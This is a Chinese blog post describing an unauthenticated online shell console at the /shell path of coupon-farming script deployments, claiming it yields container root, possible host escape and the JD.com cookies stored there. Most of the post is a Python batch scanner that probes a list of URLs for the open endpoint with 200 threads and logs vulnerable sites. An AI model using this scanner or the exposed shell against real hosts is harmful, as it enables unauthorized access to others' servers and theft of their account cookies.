美文网首页
羊毛脚本漏洞

羊毛脚本漏洞

作者: 这是什么娃哈哈 | 来源:发表于2021-07-01 01:06 被阅读0次

0x01 漏洞检测

漏洞payload: http://IP/shell

0x02 漏洞验证

在server.js代码中, 使用了在线的shell控制台, 该控制台未进行鉴权, 导致存在未授权访问


通过该漏洞获取容器中的root权限, 可通过容器逃逸获取宿主机权限


读取的京东cookie


以下为批量脚本, 代码比较粗糙,大佬勿喷

# -*- coding: utf-8 -*-
# @Time : 2021/6/30 9:07
# @Author : AD钙奶
import json
import re
import time
import requests
import ssl
import threadpool
from loguru import logger

try:
    requests.packages.urllib3.disable_warnings()
    _create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
    pass
else:
    ssl._create_default_https_context = _create_unverified_https_context


def brute_force(_url):
    urls = _url + '/shell'
    headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
        "Cache-Control": "max-age=0",
        "Connection": "keep-alive",
        "Cookie": "",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59",
    }
    try:
        resp = requests.get(url=urls, headers=headers, timeout=20)
        if resp.status_code == 200 and resp.headers['Set-Cookie']:
            info1 = f"系统存在未授权漏洞,存在漏洞的网站:  {str(urls)}"
            filename1 = time.strftime("%Y-%m-%d-") + 'vuln_存在未授权.txt'
            save_vuln(filename1, info1)
            logger.info(info1)
    except Exception as e:
        pass


def save_vuln(filename, info1):
    file_path = './result/' + filename
    with open(file_path, "a") as f:
        info1 = info1 + '\n'
        f.write(info1)


def open_file():
    with open("url3.txt", 'r', encoding='UTF-8') as f:
        urls = f.readlines()
    urls = [url.strip() for url in urls if url and url.strip()]
    return urls


def main():
    url = open_file()
    pool = threadpool.ThreadPool(200)
    thread = threadpool.makeRequests(brute_force, url)
    [pool.putRequest(req) for req in thread]
    pool.wait()


if __name__ == '__main__':
    main()


相关文章

  • 羊毛脚本漏洞

    0x01 漏洞检测 漏洞payload: http://IP/shell[http://IP/shell] ...

  • 安全漏洞之任意文件上传漏洞分析

    X微e-office的那个前台任意文件上传漏洞已经被爆出一段时间了,相关的漏洞利用脚本甚至是漏洞批量利用脚本 也有...

  • 某office前台任意文件上传漏洞分析

    X微e-office的那个前台任意文件上传漏洞已经被爆出一段时间了,相关的漏洞利用脚本甚至是漏洞批量利用脚本也有很...

  • 05 漏洞发现:识别跨站脚本(XSS)漏洞

    跨站脚本 (XSS) 是Web应用中最常见的漏洞之一,这篇文章,我们来讨论识别Web应用跨站脚本漏洞的关键点有哪些...

  • 解析漏洞

    1、漏洞简介 解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本,文件等当做可执行的脚本,文件等...

  • NetLogon 域内提权漏洞(CVE-2020-1472)

    NetLogon 域内提权漏洞(CVE-2020-1472)复现 摘要 影响版本 复现环境 漏洞脚本 复现开始 首...

  • 防XSS跨站脚本攻击类库:AntiXSS的使用

    跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页...

  • 三 XSS(一)

    跨站脚本漏洞概述 ⅩSS漏洞一直被评估为web漏洞中危害较大的漏洞,在 OWASP TOP10的排名中一直属于前三...

  • 【漏洞笔记】jQuery跨站脚本

    0x00 概述 漏洞名称:jQuery跨站脚本 风险等级:低危 问题类型:使用已知漏洞的组件 0x01 漏洞描述 ...

  • 跨站脚本攻击

    什么是跨站点脚本(XSS)? 跨站点脚本(也称为XSS)是一个Web安全漏洞,攻击者可以利用该漏洞来破坏用户与易受...

网友评论

      本文标题:羊毛脚本漏洞

      本文链接:https://www.haomeiwen.com/subject/lggdultx.html